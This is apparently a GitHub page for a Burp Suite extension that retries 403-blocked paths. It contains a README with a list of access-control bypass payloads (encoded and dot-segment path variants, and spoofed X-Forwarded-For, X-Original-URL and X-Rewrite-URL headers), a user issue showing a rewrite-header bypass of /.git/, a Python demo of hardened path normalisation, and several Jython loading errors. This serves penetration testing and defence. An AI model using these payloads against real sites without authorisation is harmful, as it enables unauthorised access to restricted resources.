
403Bypasser

A Burp Suite extension to bypass 403-restricted directories. It runs as a passive scan check (enabled by default), so every request that received a 403 response is automatically re-scanned by the extension with the payloads below; just add it to Burp Suite and enjoy.

Payloads ($1: HOSTNAME, $2: PATH):

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

Thanks @lohubi for contributing many payloads.

Installation

Burp Suite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next until Finish

Contributors

ashkanrafiee, lobuhi, sting8k, xib3rr4dar

burpsuite_403bypasser's Issues

X-Original-Url / X-Rewrite-Url bypass

Hey, I think you are using the X-Original-Url / X-Rewrite-Url vector in the wrong way. These headers usually help to bypass front server rules that are based on the URI, but you don't change the URI while using these headers.

First, normal request returns 403:

GET /.git/ HTTP/1.1
Host: example.com

This attempt to bypass will return 403 too, because the URI hasn't changed and the rule still applies:

GET /.git/ HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

This one should bypass the restriction:

GET / HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/
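The payload list in the README and this issue exercise the same two weaknesses in a front-end access rule: matching the request line literally instead of in canonical form (the `%2e`, `//`, `./`, `..;`, `%20` and `?` variants), and trusting request headers the client controls (rewrite headers such as X-Rewrite-URL, and spoofable source-address headers such as X-Forwarded-For). The following is an added example, not code from the project or its contributors: it places a naive prefix rule beside a hardened version that normalizes every path the backend might route on, drops rewrite headers at the edge, and derives the client address from the TCP peer rather than from headers. The protected prefixes, the trusted proxy address 10.0.0.2, the function names and the sample addresses are all assumptions constructed for the demo.

```python
import posixpath
import re
from ipaddress import ip_address
from urllib.parse import unquote

# Assumed policy for the demo: these path prefixes require authorization.
BLOCKED_PREFIXES = ("/admin", "/.git")
# Client-supplied headers that some backends honour as a replacement request path.
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")
# Assumed: the only reverse proxy we operate in front of the application.
TRUSTED_PROXIES = frozenset({"10.0.0.2"})


def normalize_path(raw_target: str) -> str:
    """Canonicalise a request target the way a tolerant backend would before routing."""
    path = raw_target.split("?", 1)[0].split("#", 1)[0]   # "/admin???" -> "/admin"
    for _ in range(3):                                     # bounded: handles double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]      # drop path parameters: "..;" becomes ".."
        segments.append(seg.strip())    # conservative: " admin " becomes "admin"
    path = re.sub(r"/+", "/", "/".join(segments))   # collapse "//" (normpath keeps a leading "//")
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)     # resolves "." and ".." segments, cannot climb above "/"


def _lower_keys(headers):
    return {k.lower(): v for k, v in headers.items()}


def naive_is_blocked(raw_target: str) -> bool:
    """The brittle rule: a literal prefix match on the request line exactly as received."""
    return raw_target.startswith(BLOCKED_PREFIXES)


def hardened_is_blocked(raw_target: str, headers) -> bool:
    """Normalise every path the backend might route on (request line plus any
    override header the backend may honour) and match the canonical form."""
    h = _lower_keys(headers)
    candidates = [raw_target] + [h[name] for name in OVERRIDE_HEADERS if name in h]
    return any(normalize_path(c).startswith(BLOCKED_PREFIXES) for c in candidates)


def strip_override_headers(headers):
    """Mitigation at the edge: drop client-supplied rewrite headers before forwarding."""
    return {k: v for k, v in headers.items() if k.lower() not in OVERRIDE_HEADERS}


def effective_client_ip(peer_ip: str, headers) -> str:
    """Derive the client address for IP-based rules. X-Forwarded-For is honoured only
    when the TCP peer is a proxy we operate, and then only the hop that proxy
    appended (the last element); X-Client-IP, X-Remote-IP and similar are ignored."""
    if peer_ip not in TRUSTED_PROXIES:
        return peer_ip
    xff = _lower_keys(headers).get("x-forwarded-for", "")
    hops = [hop.strip() for hop in xff.split(",") if hop.strip()]
    if not hops:
        raise ValueError("trusted proxy did not append X-Forwarded-For")  # fail closed
    return hops[-1]


def is_internal_client(peer_ip: str, headers) -> bool:
    """Example IP allow-rule: loopback or private source, judged on the effective address."""
    try:
        addr = ip_address(effective_client_ip(peer_ip, headers))
    except ValueError:          # missing or unparseable address: fail closed
        return False
    return addr.is_loopback or addr.is_private


if __name__ == "__main__":
    # Constructed request targets modelled on the payload list, with $2 = "admin".
    samples = ["/%2e/admin", "//admin//", "/./admin/./", "/..;/admin",
               "/admin%20/", "/%20admin%20/", "/admin???", "/public/index.html"]
    for target in samples:
        print(f"{target:20} naive={naive_is_blocked(target)!s:5} "
              f"hardened={hardened_is_blocked(target, {})}")
    rewrite = {"X-Rewrite-URL": "/admin"}
    print("GET / + X-Rewrite-URL   naive=%s hardened=%s"
          % (naive_is_blocked("/"), hardened_is_blocked("/", rewrite)))
    print("forwarded after strip:", strip_override_headers({"Host": "example.com", **rewrite}))
```

Running the demo shows the naive rule letting every encoded, slash-doubled and dot-segment variant through while the hardened rule blocks all of them and still passes an unrelated path; the rewrite-header case is the one the issue above describes (the request line is `/`, so a URI-based rule has nothing to match). The normalizer is deliberately conservative: trimming whitespace and resolving `..;` may block a few requests a strict backend would have served, which is the right direction for an access-control check.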

Issue while adding extension in burp

I get this error while loading the extension from the Python file:

java.lang.Exception: Failed to load Python interpreter from Jython JAR file
	at burp.e76.<init>(Unknown Source)
	at burp.f1z.a(Unknown Source)
	at burp.gvj.lambda$panelLoaded$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
	at java.base/java.lang.Thread.run(Thread.java:834)

NotImplementedError

jdk 15, burpsuite v2021.8, jython-standalone-2.7.0

NotImplementedError

	at org.python.core.Py.NotImplementedError(Py.java:167)
	at org.python.proxies.__main__$BurpExtender$0.doActiveScan(Unknown Source)
	at burp.csj.run(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
	at java.base/java.lang.Thread.run(Thread.java:832)


Extension loaded in BurpSuite but not working

Hi,

I've loaded the extension in BurpSuite with no errors, but when requesting a resource with a 403 response, I don't see any other requests in the Proxy HTTP History.

Am I doing something wrong?

Thanks

I got this error when loading the plug-in

Traceback (most recent call last):
File "", line 1, in
OSError: (22, 'Invalid argument', 'D:\Burp_Suite_Pro_v2021.8\bp??\BurpSuite_403Bypasser-main')

at org.python.core.Py.OSError(Py.java:135)
at org.python.modules.posix.PosixModule.absolutePath(PosixModule.java:1343)
at org.python.modules.posix.PosixModule.chdir(PosixModule.java:300)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:64)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:190)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:208)
at org.python.core.PyObject.__call__(PyObject.java:461)
at org.python.core.PyObject.__call__(PyObject.java:465)
at org.python.pycode._pyx2.f$0(<string>:1)
at org.python.pycode._pyx2.call_function(<string>)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1687)
at org.python.core.Py.exec(Py.java:1731)
at org.python.util.PythonInterpreter.exec(PythonInterpreter.java:268)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:64)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at burp.fpz.<init>(Unknown Source)
at burp.d25.a(Unknown Source)
at burp.gix.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)

Error while loading the extension in Burp with the latest Jython 2.7.2

SyntaxError: Non-ASCII character in file 'C:\Users\sbdefault\Desktop\Burp Custom Extensions\403bypasser.py', but no encoding declared; see http://www.python.org/peps/pep-0263.html for details

at org.python.core.Py.SyntaxError(Py.java:171)
at org.python.core.ParserFacade.fixParseError(ParserFacade.java:105)
at org.python.core.ParserFacade.parse(ParserFacade.java:190)
at org.python.core.Py.compile_flags(Py.java:2232)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:527)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:287)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at burp.ip.<init>(Unknown Source)
at burp.xkf.a(Unknown Source)
at burp.plh.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
